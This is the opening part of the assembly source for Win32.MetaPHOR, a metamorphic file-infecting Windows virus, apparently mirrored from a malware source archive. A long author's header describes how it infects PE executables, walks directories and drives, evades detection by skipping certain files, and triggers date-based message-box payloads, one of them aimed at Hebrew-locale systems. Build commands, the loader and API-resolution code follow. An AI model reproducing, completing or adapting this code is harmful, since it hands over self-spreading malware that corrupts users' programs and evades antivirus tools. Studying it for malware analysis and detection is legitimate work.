mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
13915 lines
620 KiB
NASM
13915 lines
620 KiB
NASM
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
;; ---------------------- ;;
|
|
;; * Win32.MetaPHOR v1B * ;;
|
|
;; ---------------------- ;;
|
|
;; ;;
|
|
;; Metamorphic Permutating High-Obfuscating Reassembler ;;
|
|
;; ;;
|
|
;; Coded by The Mental Driller/29A ;;
|
|
;; ;;
|
|
;; ;;
|
|
;; I proudly present my very first metamorphic virus (in its version 1.1). ;;
|
|
;; ;;
|
|
;; This virus is only code. No tables, no indirect jumps, etc. etc. It ;;
|
|
;; doesn't uses the stack to construct strings, executable code or data: ;;
|
|
;; what I do is a reservation of 3'5 Mb of data (more or less) with ;;
|
|
;; VirtualAlloc and then use the decryptor to copy the decrypted virus there ;;
|
|
;; (or unencrypted, since it has a probability of 1/16 of being unencrypted, ;;
|
|
;; so the decryptor in that cases is in fact a copy routine). The reserved ;;
|
|
;; memory is organized in sections (as if it were a PE) where I do all the ;;
|
|
;; operations. VirtualAlloc will be retrieved by the decryptor if it's not ;;
|
|
;; imported by the host, and the host must import GetModuleHandleA/W and ;;
|
|
;; GetProcAddress to be infected. This functions will be used by the virus ;;
|
|
;; to get the needed APIs. ;;
|
|
;; ;;
|
|
;; The type of metamorphism followed is what I call the "accordion model": ;;
|
|
;; disassembly/depermutation -> shrinking -> permutation -> expansion -> ;;
|
|
;; -> reassembly, so the code can be bigger or smaller than the previous ;;
|
|
;; generation. ;;
|
|
;; ;;
|
|
;; The metamorphism in this virus is complete: even the result of the ;;
|
|
;; shrinking can't be used for detection, because is different in every ;;
|
|
;; generation. That's the point where I introduce a new concept: dimensions ;;
|
|
;; in recoding (I mean, code that only get shrinked on two or more ;;
|
|
;; generations, but not in the immediate following; this would be the ;;
|
|
;; "third" dimension). This makes the disassembly to have always a different ;;
|
|
;; shape from generation to generation, but, when stabilized, never growing ;;
|
|
;; uncontrolablely. ;;
|
|
;; ;;
|
|
;; I have added a genetic algorithm in certain parts of the code to make it ;;
|
|
;; evolve to the best shape (the one that evades more detections, the action ;;
|
|
;; more stealthy, etc. etc.). It's a simple algorithm based on weights, so ;;
|
|
;; don't expect artificial intelligence :) (well, maybe in the future :P). ;;
|
|
;; ;;
|
|
;; I tried to comment the code as cleanly as possible, but well... :) ;;
|
|
;; ;;
|
|
;; If the code isn't optimized (in fact, it's NOT optimized), it's because: ;;
|
|
;; ;;
|
|
;; 1) It's more clear to see the code that the internal engine will deal ;;
|
|
;; with (for example, many times I use SUB ECX,1 instead of DEC ECX, ;;
|
|
;; although the disassembler can deal with both opcodes). ;;
|
|
;; 2) What's the point for optimizing the code when in next generation it ;;
|
|
;; will be completely unoptimized/garbled? :) ;;
|
|
;; 3) The obfuscation in next generations is bigger (MUCH bigger). ;;
|
|
;; ;;
|
|
;; ;;
|
|
;; General sheet of characteristics: ;;
|
|
;; ;;
|
|
;; Name of the virus.............: MetaPHOR v1.0 ;;
|
|
;; Author........................: The Mental Driller / 29A ;;
|
|
;; Size..........................: On 1st generation: 32828 bytes ;;
|
|
;; On next ones: variable, but not less ;;
|
|
;; than 64 Kb ;;
|
|
;; Targets.......................: Win32 PE EXEs, supporting three types ;;
|
|
;; of infection: mid-infection (when ;;
|
|
;; .reloc is present), at last section ;;
|
|
;; but using the padding space between ;;
|
|
;; sections to store the decrytor/mover, ;;
|
|
;; or all at last section. ;;
|
|
;; It infects EXEs with a 50% of prob. in ;;
|
|
;; current directory and going up the ;;
|
|
;; directory three by three levels. It ;;
|
|
;; also retrieves the drive strings on ;;
|
|
;; the system and makes the same if they ;;
|
|
;; are fixed or network drives. ;;
|
|
;; It uses EPO patching ExitProcess. ;;
|
|
;; Stealth action................: It doesn't enter in directories that ;;
|
|
;; begin with 'W' (avoiding the windows ;;
|
|
;; directory) and doesn't infect files ;;
|
|
;; with a 'V' in the name or beginning ;;
|
|
;; with the letters 'PA', 'F-', 'SC', ;;
|
|
;; 'DR' or 'NO'. ;;
|
|
;; Genetic algorithm in the selection of ;;
|
|
;; the infection methods, the creation of ;;
|
|
;; of the decryptor and some more things ;;
|
|
;; to make it more resistant or more ;;
|
|
;; difficult to detect due to "evolution".;;
|
|
;; Encrypted.....................: Sometimes not. ;;
|
|
;; Polymorphic...................: Yes ;;
|
|
;; Metamorphic...................: Yes ;;
|
|
;; Payloads......................: 1) A message box on 17h March, June, ;;
|
|
;; September and December with a ;;
|
|
;; metamorphic message :). ;;
|
|
;; 2) On 14h May and on hebrew systems it ;;
|
|
;; displays a messagebox with the text: ;;
|
|
;; "Free Palestine!" ;;
|
|
;; Anti-debugging................: Implicit ;;
|
|
;; Release history...............: ;;
|
|
;; v1.0: 11-02-2002 (I just finished commenting the source code ;;
|
|
;; and correcting the bugs I found doing that). ;;
|
|
;; v1.1: 14-02-2002 ;;
|
|
;; ;;
|
|
;; ;;
|
|
;; To do in next versions: ;;
|
|
;; ;;
|
|
;; 1) ELF infection: I only have to add APIs and call one or another ;;
|
|
;; depending on the operating system, and add the ELF infection algorithm. ;;
|
|
;; 2) Reassembly for different processors: IA64, Alpha, PowerPC, etc. I only ;;
|
|
;; have to code a new disassembler/reassembler, since for every internal ;;
|
|
;; operation I use a self-defined pseudo-assembler with its own opcodes. ;;
|
|
;; 3) Plug-in injector ;;
|
|
;; 4) More things (of course!! :). ;;
|
|
;; ;;
|
|
;; ;;
|
|
;; My thanks comes to: ;;
|
|
;; 29A, of course. ;;
|
|
;; Vecna & Z0MBiE for being pioneers in the field of metamorphism. I thank ;;
|
|
;; Vecna his interest by this virus and his suggestions. Of course, I ;;
|
|
;; never took them in account :P (acaso te dije como tenias que hacer ;;
|
|
;; el Lexo32, boludin asqueroso??? :P :P :P :P ;D) ;;
|
|
;; Eden Kirin, the author of ConTEXT (editor for programmers). It would be ;;
|
|
;; a hell to make a source like this one with EDIT :). ;;
|
|
;; The opressed people in the world. ;;
|
|
;; ;;
|
|
;; ;;
|
|
;; Also big thanks to Trent Reznor and NIN by their music, which inspired ;;
|
|
;; me greatly while coding this, specially the Halo 14 (commonly known as ;;
|
|
;; "The Fragile"). From the lyrics of "Somewhat damaged", a quote that ;;
|
|
;; resumes quite well the feeling of this code: ;;
|
|
;; ;;
|
|
;; "how could I ever think it's funny how ;;
|
|
;; everything that swore it wouldn't change is different now..." ;;
|
|
;; ;;
|
|
;; Well, in the song it doesn't have that meaning, but it does when you ;;
|
|
;; quote it alone heading this code :). ;;
|
|
;; ;;
|
|
;; And a big "FUCK YOU" to fascists, whatever the flag or religion they use ;;
|
|
;; to hide themselves behind, the country they live/represent and the moral ;;
|
|
;; reasons they say to justify their actions (for both attack and revenge): ;;
|
|
;; all them have the same inferior mind that makes them to think like ;;
|
|
;; animals. ;;
|
|
;; ;;
|
|
;; ;;
|
|
;; OK, so here's the proggy. Enjoy it as much as I enjoyed doing it. ;;
|
|
;; ;;
|
|
;; To assemble: ;;
|
|
;; TASM32 /m29A /ml MetaPHOR.asm ;;
|
|
;; TLINK32 -Tpe -aa -x MetaPHOR.obj,,,kernel32.lib ;;
|
|
;; ;;
|
|
;; No need of making PEWRSEC! ;;
|
|
;; ;;
|
|
;; ;;
|
|
;; Quick reference (keyword search): ;;
|
|
;; ;;
|
|
;; Variable declaration........................: Key_!VarDeclr ;;
|
|
;; Beginning of virus..........................: Key_!VirusStart ;;
|
|
;; Disassembler................................: Key_!Disassembler ;;
|
|
;; Shrinker....................................: Key_!Shrinker ;;
|
|
;; Variable identificator......................: Key_!VarIdent ;;
|
|
;; Permutator..................................: Key_!Permutator ;;
|
|
;; Expander....................................: Key_!Xpander ;;
|
|
;; Reassembler.................................: Key_!Assembler ;;
|
|
;; Infection code..............................: Key_!Infector ;;
|
|
;; Decryptor maker.............................: Key_!MakePoly ;;
|
|
;; ;;
|
|
;; ;;
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
.386p
|
|
.model flat
|
|
locals
|
|
|
|
.code
|
|
ret ; All code in DATA section. TASM allow this and we
|
|
.data ; don't need to activate the write flag after assembling
|
|
; the code.
|
|
|
|
AddressToFree dd 0
|
|
|
|
extrn ExitProcess:PROC
|
|
extrn VirtualAlloc:PROC
|
|
extrn VirtualFree:PROC
|
|
extrn GetModuleHandleA:PROC
|
|
extrn GetProcAddress:PROC
|
|
extrn MessageBoxA:PROC ; First generation imports
|
|
|
|
|
|
;; This code (PreMain) only exists at first generation.
|
|
;; PreMain is a loader of the virus in the same way an infected host will
|
|
;; load it.
|
|
PreMain proc
|
|
push 4
|
|
push 1000h
|
|
push 340000h ; Reserve 340000h bytes (~ 3.4Mb)
|
|
push 0
|
|
call VirtualAlloc
|
|
or eax, eax
|
|
jz @@Error
|
|
mov ebp, eax ; Set delta of reserved memory
|
|
|
|
mov [AddressToFree], eax
|
|
mov ebx, eax
|
|
mov esi, offset Main
|
|
mov edi, eax
|
|
mov ecx, offset EndOfCode
|
|
sub ecx, offset Main
|
|
rep movsb ; Copy virus
|
|
|
|
push __DISASM2_SECTION
|
|
push __DATA_SECTION
|
|
push __BUFFERS_SECTION
|
|
push __DISASM_SECTION
|
|
push __CODE_SECTION ; Push section addresses
|
|
mov eax, offset GetProcAddress
|
|
mov eax, [eax+2]
|
|
push eax ; Push needed APIs
|
|
mov eax, offset GetModuleHandleA
|
|
mov eax, [eax+2]
|
|
push eax
|
|
push 5*2 ; Bit 0=0: 'A', 1:'W' for GetModuleHandle
|
|
call ebx ; Call MetaPHOR!
|
|
|
|
push 0C000h
|
|
push 0
|
|
push dword ptr [AddressToFree]
|
|
call VirtualFree ; This isn't needed at all, since where
|
|
; our process is destroyed all the virtual memory
|
|
; allocated by it is deallocated automatically.
|
|
@@Error:
|
|
push 0
|
|
call ExitProcess
|
|
PreMain endp
|
|
|
|
;; Now we are executing in the reserved memory
|
|
|
|
;;
|
|
;; ATTENTION: LEAs loading offsets of variables are problematic (due to the
|
|
;; variable identificator) so, in the cases like string constructors and
|
|
;; getting info from FindFirst and FindNext the operations will be performed
|
|
;; directly into memory sections, to avoid them getting marked as variables.
|
|
|
|
;; In the entrance, the polymorphic loader/decryptor must pass the next data:
|
|
;;; DeltaReg --> Initialized (in this case, EBP)
|
|
;;;
|
|
;;; In reverse-push order (C-like):
|
|
;;; * (Number of register used for Delta SHL 1) AND (A/W flag for
|
|
;; GetModuleHandleA/W)
|
|
;;; * Address to GetModuleHandle in import table
|
|
;;; * Address to GetProcAddress in import table
|
|
;;; * Offset of CODE_SECTION
|
|
;;; * Offset of DISASM_SECTION
|
|
;;; * Offset of BUFFERS_SECTION
|
|
;;; * Offset of DATA_SECTION
|
|
;;; * Offset of DISASM2_SECTION
|
|
;;;
|
|
;;; All data passed is local to the engine, I mean, it can be modified (and
|
|
;;; in fact it will be modified) during the reassembly. In this way we don't
|
|
;;; have even the variables in a fixed delta location, although even keeping
|
|
;;; fixed section offsets the variables are relocated.
|
|
|
|
;;
|
|
;;
|
|
|
|
;; KEYWORD: Key_!VarDeclr
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
;;;************************************************************************;;;
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
;;
|
|
;; Memory addresses. The variables are internal offsets into the data section,
|
|
;; so they are coded in this way. As you can see, all them are EQUs.
|
|
;;
|
|
;; There are also some equates to make easier the programming, although all
|
|
;; the values here are only valid on first generation, due to the fact that
|
|
;; they'll recalculated and randomized.
|
|
;;
|
|
__CODE_SECTION EQU 000000h
|
|
__DISASM_SECTION EQU 100000h
|
|
__BUFFERS_SECTION EQU 080000h
|
|
__LABEL_SECTION EQU __BUFFERS_SECTION + 00000h
|
|
__VARIABLE_SECTION EQU __BUFFERS_SECTION + 10000h
|
|
__BUFFER1_SECTION EQU __BUFFERS_SECTION + 20000h
|
|
__BUFFER2_SECTION EQU __BUFFERS_SECTION + 30000h
|
|
__VAR_MARKS_SECTION EQU __BUFFERS_SECTION + 40000h
|
|
__DATA_SECTION EQU 0E0000h
|
|
__DISASM2_SECTION EQU 200000h
|
|
|
|
NumberOfLabels EQU __DATA_SECTION + 0000h
|
|
NumberOfInstructions EQU __DATA_SECTION + 0008h
|
|
InstructionTable EQU __DATA_SECTION + 0010h
|
|
LabelTable EQU __DATA_SECTION + 0018h
|
|
FutureLabelTable EQU __DATA_SECTION + 0020h
|
|
PathMarksTable EQU __DATA_SECTION + 0028h
|
|
NumberOfLabelsPost EQU __DATA_SECTION + 0030h
|
|
AddressOfLastInstruction EQU __DATA_SECTION + 0038h
|
|
VariableTable EQU __DATA_SECTION + 0040h
|
|
NumberOfVariables EQU __DATA_SECTION + 0048h
|
|
FramesTable EQU __DATA_SECTION + 0050h
|
|
PermutationResult EQU __DATA_SECTION + 0058h
|
|
JumpsTable EQU __DATA_SECTION + 0060h
|
|
AddressOfLastFrame EQU __DATA_SECTION + 0068h
|
|
PositionOfFirstInstruction EQU __DATA_SECTION + 0070h
|
|
MODValue EQU __DATA_SECTION + 0078h
|
|
NumberOfJumps EQU __DATA_SECTION + 0080h
|
|
RndSeed1 EQU __DATA_SECTION + 0088h
|
|
RndSeed2 EQU __DATA_SECTION + 0090h
|
|
ExpansionResult EQU __DATA_SECTION + 0098h
|
|
Register8Bits EQU __DATA_SECTION + 00A0h
|
|
Xp_Register0 EQU __DATA_SECTION + 00A8h
|
|
Xp_Register1 EQU __DATA_SECTION + 00B0h
|
|
Xp_Register2 EQU __DATA_SECTION + 00B8h
|
|
Xp_Register3 EQU __DATA_SECTION + 00C0h
|
|
Xp_Register4 EQU __DATA_SECTION + 00C8h
|
|
Xp_Register5 EQU __DATA_SECTION + 00D0h
|
|
Xp_Register6 EQU __DATA_SECTION + 00D8h
|
|
Xp_Register7 EQU __DATA_SECTION + 00E0h
|
|
DeltaRegister EQU __DATA_SECTION + 00E8h
|
|
Xp_8Bits EQU __DATA_SECTION + 00F0h
|
|
Xp_Operation EQU __DATA_SECTION + 00F8h
|
|
Xp_Register EQU __DATA_SECTION + 0100h
|
|
Xp_Mem_Index1 EQU __DATA_SECTION + 0108h
|
|
Xp_Mem_Index2 EQU __DATA_SECTION + 0110h
|
|
Xp_Mem_Addition EQU __DATA_SECTION + 0118h
|
|
Xp_Immediate EQU __DATA_SECTION + 0120h
|
|
Xp_SrcRegister EQU __DATA_SECTION + 0128h
|
|
Xp_FlagRegOrMem EQU __DATA_SECTION + 0130h
|
|
Xp_RecurseLevel EQU __DATA_SECTION + 0138h
|
|
Xp_LEAAdditionFlag EQU __DATA_SECTION + 0140h
|
|
VarMarksTable EQU __DATA_SECTION + 0148h
|
|
_BUFFERS_SECTION EQU __DATA_SECTION + 0150h
|
|
_CODE_SECTION EQU __DATA_SECTION + 0158h
|
|
_DISASM_SECTION EQU __DATA_SECTION + 0160h
|
|
_LABEL_SECTION EQU __DATA_SECTION + 0168h
|
|
_VARIABLE_SECTION EQU __DATA_SECTION + 0170h
|
|
_BUFFER1_SECTION EQU __DATA_SECTION + 0178h
|
|
_BUFFER2_SECTION EQU __DATA_SECTION + 0180h
|
|
_VAR_MARKS_SECTION EQU __DATA_SECTION + 0188h
|
|
_DATA_SECTION EQU __DATA_SECTION + 0190h
|
|
_DISASM2_SECTION EQU __DATA_SECTION + 0198h
|
|
New_CODE_SECTION EQU __DATA_SECTION + 01A0h
|
|
New_DISASM_SECTION EQU __DATA_SECTION + 01A8h
|
|
New_BUFFERS_SECTION EQU __DATA_SECTION + 01B0h
|
|
; New_LABEL_SECTION EQU __DATA_SECTION + 01B0h
|
|
; New_VARIABLE_SECTION EQU __DATA_SECTION + 01B8h
|
|
; New_BUFFER1_SECTION EQU __DATA_SECTION + 01C0h
|
|
; New_BUFFER2_SECTION EQU __DATA_SECTION + 01C8h
|
|
; New_VAR_MARKS_SECTION EQU __DATA_SECTION + 01D0h
|
|
New_DATA_SECTION EQU __DATA_SECTION + 01D8h
|
|
New_DISASM2_SECTION EQU __DATA_SECTION + 01E0h
|
|
RVA_GetModuleHandle EQU __DATA_SECTION + 01E8h
|
|
RVA_GetProcAddress EQU __DATA_SECTION + 01F0h
|
|
FlagAorW EQU __DATA_SECTION + 01F8h
|
|
ReturnValue EQU __DATA_SECTION + 0200h
|
|
hKernel EQU __DATA_SECTION + 0208h
|
|
hUser32 EQU __DATA_SECTION + 0210h
|
|
RVA_CreateFileA EQU __DATA_SECTION + 0218h
|
|
RVA_CreateFileMappingA EQU __DATA_SECTION + 0220h
|
|
RVA_MapViewOfFile EQU __DATA_SECTION + 0228h
|
|
RVA_UnmapViewOfFile EQU __DATA_SECTION + 0230h
|
|
RVA_GetFileSize EQU __DATA_SECTION + 0238h
|
|
RVA_GetFileAttributesA EQU __DATA_SECTION + 0240h
|
|
RVA_SetFileAttributesA EQU __DATA_SECTION + 0248h
|
|
RVA_SetFilePointer EQU __DATA_SECTION + 0250h
|
|
RVA_SetFileTime EQU __DATA_SECTION + 0258h
|
|
RVA_SetEndOfFile EQU __DATA_SECTION + 0260h
|
|
RVA_FindFirstFileA EQU __DATA_SECTION + 0268h
|
|
RVA_FindNextFileA EQU __DATA_SECTION + 0270h
|
|
RVA_FindClose EQU __DATA_SECTION + 0278h
|
|
RVA_CloseHandle EQU __DATA_SECTION + 0280h
|
|
RVA_MessageBoxA EQU __DATA_SECTION + 0288h
|
|
NewLabelTable EQU __DATA_SECTION + 0290h
|
|
Asm_ByteToSort EQU __DATA_SECTION + 0298h
|
|
JumpRelocationTable EQU __DATA_SECTION + 02A0h
|
|
NumberOfJumpRelocations EQU __DATA_SECTION + 02A8h
|
|
Permut_LastInstruction EQU __DATA_SECTION + 02B0h
|
|
TranslatedDeltaRegister EQU __DATA_SECTION + 02B8h
|
|
hFile EQU __DATA_SECTION + 02C0h
|
|
FileSize EQU __DATA_SECTION + 02C8h
|
|
OriginalFileSize EQU __DATA_SECTION + 02D0h
|
|
hMapping EQU __DATA_SECTION + 02D8h
|
|
MappingAddress EQU __DATA_SECTION + 02E0h
|
|
HeaderAddress EQU __DATA_SECTION + 02E8h
|
|
StartOfSectionHeaders EQU __DATA_SECTION + 02F0h
|
|
RelocHeader EQU __DATA_SECTION + 02F8h
|
|
TextHeader EQU __DATA_SECTION + 0300h
|
|
DataHeader EQU __DATA_SECTION + 0308h
|
|
RVA_TextHole EQU __DATA_SECTION + 0310h
|
|
Phys_TextHole EQU __DATA_SECTION + 0318h
|
|
TextHoleSize EQU __DATA_SECTION + 0320h
|
|
RVA_DataHole EQU __DATA_SECTION + 0328h
|
|
Phys_DataHole EQU __DATA_SECTION + 0330h
|
|
MakingFirstHole EQU __DATA_SECTION + 0338h
|
|
ExitProcessAddress EQU __DATA_SECTION + 0340h
|
|
GetModuleHandleAddress EQU __DATA_SECTION + 0348h
|
|
GetProcAddressAddress EQU __DATA_SECTION + 0350h
|
|
VirtualAllocAddress EQU __DATA_SECTION + 0358h
|
|
GetModuleHandleMode EQU __DATA_SECTION + 0360h
|
|
VirtualPositionOfVar EQU __DATA_SECTION + 0368h
|
|
PhysicalPositionOfVar EQU __DATA_SECTION + 0370h
|
|
Kernel32Imports EQU __DATA_SECTION + 0378h
|
|
hFindFile EQU __DATA_SECTION + 0380h
|
|
Addr_FilePath EQU __DATA_SECTION + 0388h
|
|
FileAttributes EQU __DATA_SECTION + 0390h
|
|
SizeOfNewCode EQU __DATA_SECTION + 0398h
|
|
FindFileData EQU __DATA_SECTION + 03A0h
|
|
OtherBuffers EQU __DATA_SECTION + 03A8h
|
|
RoundedSizeOfNewCode EQU __DATA_SECTION + 03B0h
|
|
NewAssembledCode EQU __DATA_SECTION + 03B8h
|
|
NumberOfUndoActions EQU __DATA_SECTION + 03C0h
|
|
LastHeader EQU __DATA_SECTION + 03C8h
|
|
MaxSizeOfDecryptor EQU __DATA_SECTION + 03D0h
|
|
CreatingADecryptor EQU __DATA_SECTION + 03D8h
|
|
DecryptorPseudoCode EQU __DATA_SECTION + 03E0h
|
|
AssembledDecryptor EQU __DATA_SECTION + 03E8h
|
|
Decryptor_DATA_SECTION EQU __DATA_SECTION + 03F0h
|
|
SizeOfExpansion EQU __DATA_SECTION + 03F8h
|
|
SizeOfDecryptor EQU __DATA_SECTION + 0400h
|
|
TypeOfEncryption EQU __DATA_SECTION + 0408h
|
|
EncryptionKey EQU __DATA_SECTION + 0410h
|
|
IndexValue EQU __DATA_SECTION + 0418h
|
|
IndexRegister EQU __DATA_SECTION + 0420h
|
|
BufferRegister EQU __DATA_SECTION + 0428h
|
|
CounterRegister EQU __DATA_SECTION + 0430h
|
|
BufferValue EQU __DATA_SECTION + 0438h
|
|
CounterValue EQU __DATA_SECTION + 0440h
|
|
Poly_FirstPartOfFunction EQU __DATA_SECTION + 0448h
|
|
Poly_SecondPartOfFunction EQU __DATA_SECTION + 0450h
|
|
Poly_ThirdPartOfFunction EQU __DATA_SECTION + 0458h
|
|
AdditionToBuffer EQU __DATA_SECTION + 0460h
|
|
Poly_Jump_ErrorInVirtualAlloc EQU __DATA_SECTION+0468h
|
|
;Index2Register EQU __DATA_SECTION + 0470h
|
|
Poly_LoopLabel EQU __DATA_SECTION + 0478h
|
|
RVA_GetSystemTime EQU __DATA_SECTION + 0480h
|
|
RVA_GetTickCount EQU __DATA_SECTION + 0488h
|
|
RVA_GetDriveTypeA EQU __DATA_SECTION + 0490h
|
|
RVA_GetLogicalDriveStringsA EQU __DATA_SECTION + 0498h
|
|
RVA_SetCurrentDirectoryA EQU __DATA_SECTION + 04A0h
|
|
StartOfEncryptedData EQU __DATA_SECTION + 04A8h
|
|
SizeOfNewCodeP2 EQU __DATA_SECTION + 04B0h
|
|
Poly_InitialValue EQU __DATA_SECTION + 04B8h
|
|
Poly_Addition EQU __DATA_SECTION + 04C0h
|
|
Poly_ExcessJumpInstruction EQU __DATA_SECTION + 04C8h
|
|
DirectoryDeepness EQU __DATA_SECTION + 04D0h
|
|
RVA_GetSystemDefaultLCID EQU __DATA_SECTION + 04D8h
|
|
Poly_JumpRandomExecution EQU __DATA_SECTION + 04E0h
|
|
Weight_X000_3 EQU __DATA_SECTION + 04E8h
|
|
Weight_X004_7 EQU __DATA_SECTION + 04F0h
|
|
Weight_X008_11 EQU __DATA_SECTION + 04F8h
|
|
Weight_X012_15 EQU __DATA_SECTION + 0500h
|
|
Weight_X016_19 EQU __DATA_SECTION + 0508h
|
|
Weight_X020_23 EQU __DATA_SECTION + 0510h
|
|
|
|
;;
|
|
;;
|
|
;; End of variables
|
|
;;
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
|
|
|
|
;; KEYWORD: Key_!VirusStart
|
|
|
|
Main proc
|
|
; EBP = Delta offset
|
|
pop ebx ; Return address
|
|
|
|
pop eax
|
|
mov ecx, eax
|
|
and eax, 1
|
|
mov [ebp+FlagAorW], eax ; Get if GetModuleHandle is A or W
|
|
and ecx, 0FFFFFFFEh
|
|
shr ecx, 1
|
|
mov [ebp+DeltaRegister], ecx ; Get the delta register nr.
|
|
|
|
pop eax
|
|
mov eax, [eax]
|
|
mov [ebp+RVA_GetModuleHandle], eax
|
|
pop eax
|
|
mov eax, [eax]
|
|
mov [ebp+RVA_GetProcAddress], eax
|
|
pop eax
|
|
and eax, 03FFFFFh ; Eliminate the two highest bits
|
|
mov [ebp+_CODE_SECTION], eax
|
|
pop eax
|
|
and eax, 03FFFFFh ; "
|
|
mov [ebp+_DISASM_SECTION], eax
|
|
pop eax
|
|
and eax, 03FFFFFh ; "
|
|
mov [ebp+_BUFFERS_SECTION], eax
|
|
|
|
mov [ebp+_LABEL_SECTION], eax ; Construct the other
|
|
add eax, 10000h ; section addresses
|
|
mov [ebp+_VARIABLE_SECTION], eax
|
|
add eax, 10000h
|
|
mov [ebp+_BUFFER1_SECTION], eax
|
|
add eax, 10000h
|
|
mov [ebp+_BUFFER2_SECTION], eax
|
|
add eax, 10000h
|
|
mov [ebp+_VAR_MARKS_SECTION], eax
|
|
|
|
pop eax
|
|
and eax, 03FFFFFh
|
|
mov [ebp+_DATA_SECTION], eax
|
|
pop eax
|
|
and eax, 03FFFFFh
|
|
mov [ebp+_DISASM2_SECTION], eax
|
|
push ebx ; Restore return value
|
|
|
|
|
|
;; Let's set the weights for the genetic algorithm. These are code structures
|
|
;; recognized by the shrinker.
|
|
;; The initial values of the weights are not arbitrary: they are the initial
|
|
;; values that simulate the random behaviour that was before the addition of
|
|
;; this type of algorithm.
|
|
;; These code structures are shrinked as
|
|
;; SET_WEIGHT [ebp+Weight_X000_3],0,EAX,ECX
|
|
;; SET_WEIGHT [ebp+Weight_X004_7],1,EAX,ECX
|
|
;; and so on.
|
|
push eax
|
|
mov eax, 0
|
|
mov ecx, 10808080h ; Weights 3,2,1 and 0
|
|
mov [ebp+Weight_X000_3], ecx
|
|
pop eax
|
|
|
|
|
|
push eax
|
|
mov eax, 1
|
|
mov ecx, 10808010h ; Weights 7,6,5,4
|
|
mov [ebp+Weight_X004_7], ecx
|
|
pop eax
|
|
|
|
push eax
|
|
mov eax, 2
|
|
mov ecx, 80808055h ; Weights 11,10,9,8
|
|
mov [ebp+Weight_X008_11], ecx
|
|
pop eax
|
|
|
|
push eax
|
|
mov eax, 3
|
|
mov ecx, 80408080h ; Weights 15,14,13,12
|
|
mov [ebp+Weight_X012_15], ecx
|
|
pop eax
|
|
|
|
push eax
|
|
mov eax, 4
|
|
mov ecx, 55404040h ; Weights 19,18,17,16
|
|
mov [ebp+Weight_X016_19], ecx
|
|
pop eax
|
|
|
|
push eax
|
|
mov eax, 5
|
|
mov ecx, 0F0808080h ; Weights 23,22,21,20
|
|
mov [ebp+Weight_X020_23], ecx
|
|
pop eax
|
|
|
|
;; Let's get the addresses of the APIs that we are going to use:
|
|
mov edx, [ebp+_BUFFER1_SECTION]
|
|
add edx, ebp
|
|
|
|
push eax
|
|
push ecx
|
|
push edx ; APICALL_BEGIN
|
|
|
|
mov eax, 'nrek'
|
|
mov [edx], eax
|
|
mov eax, '23le'
|
|
mov [edx+4], eax
|
|
mov eax, 'lld.'
|
|
mov [edx+8], eax
|
|
xor eax, eax
|
|
mov [edx+0Ch], eax ; Get the address of KERNEL32.DLL
|
|
call APICall_GetModuleHandle
|
|
pop edx
|
|
pop ecx
|
|
pop eax ; APICALL_END
|
|
|
|
mov eax, [ebp+ReturnValue]
|
|
or eax, eax ; Get the handle. If 0, we exit
|
|
jz @@Error
|
|
mov [ebp+hKernel], eax
|
|
|
|
push eax
|
|
push ecx
|
|
push edx ; APICALL_BEGIN
|
|
|
|
mov eax, 'resu'
|
|
mov [edx], eax
|
|
mov eax, 'd.23'
|
|
mov [edx+4], eax
|
|
mov eax, 'll'
|
|
mov [edx+8], eax ; Get the address of USER32.DLL
|
|
call APICall_GetModuleHandle
|
|
pop edx
|
|
pop ecx
|
|
pop eax ; APICALL_END
|
|
|
|
mov eax, [ebp+ReturnValue] ; It doesn't matter if we
|
|
mov [ebp+hUser32], eax ; failed: it's used only to
|
|
; get MessageBoxA for the
|
|
; payload
|
|
|
|
mov edx, [ebp+_BUFFER1_SECTION]
|
|
add edx, ebp
|
|
mov edi, [ebp+hKernel] ; Place to construct the addresses
|
|
; names
|
|
|
|
mov eax, 'aerC'
|
|
mov [edx], eax
|
|
mov eax, 'iFet'
|
|
mov [edx+4], eax
|
|
mov eax, 'Ael'
|
|
mov [edx+8], eax
|
|
call GetFunction ; Get CreateFileA
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_CreateFileA], eax
|
|
|
|
mov eax, 'ppaM'
|
|
mov [edx+0Ah], eax
|
|
mov eax, 'Agni'
|
|
mov [edx+0Eh], eax
|
|
xor eax, eax
|
|
mov [edx+12h], eax
|
|
call GetFunction ; Get CreateFileMappingA
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_CreateFileMappingA], eax
|
|
|
|
add edx, 2
|
|
mov eax, 'VpaM'
|
|
mov [edx], eax
|
|
mov eax, 'Owei'
|
|
mov [edx+4], eax
|
|
mov eax, 'liFf'
|
|
mov [edx+8], eax
|
|
mov eax, 'e'
|
|
mov [edx+0Ch], eax
|
|
call GetFunction ; Get MapViewOfFile
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_MapViewOfFile], eax
|
|
|
|
sub edx, 2
|
|
mov eax, 'amnU'
|
|
mov [edx], eax
|
|
call GetFunction ; Get UnmapViewOfFile
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_UnmapViewOfFile], eax
|
|
|
|
mov eax, 'SteG'
|
|
mov [edx], eax
|
|
mov eax, 'etsy'
|
|
mov [edx+4], eax
|
|
mov eax, 'miTm'
|
|
mov [edx+8], eax
|
|
mov eax, 'e'
|
|
mov [edx+0Ch], eax
|
|
call GetFunction ; Get GetSystemTime
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_GetSystemTime], eax
|
|
|
|
mov eax, 'virD'
|
|
mov [edx+3], eax
|
|
mov eax, 'pyTe'
|
|
mov [edx+7], eax
|
|
mov eax, 'Ae'
|
|
mov [edx+0Bh], eax
|
|
call GetFunction ; Get GetDriveTypeA
|
|
or eax, eax
|
|
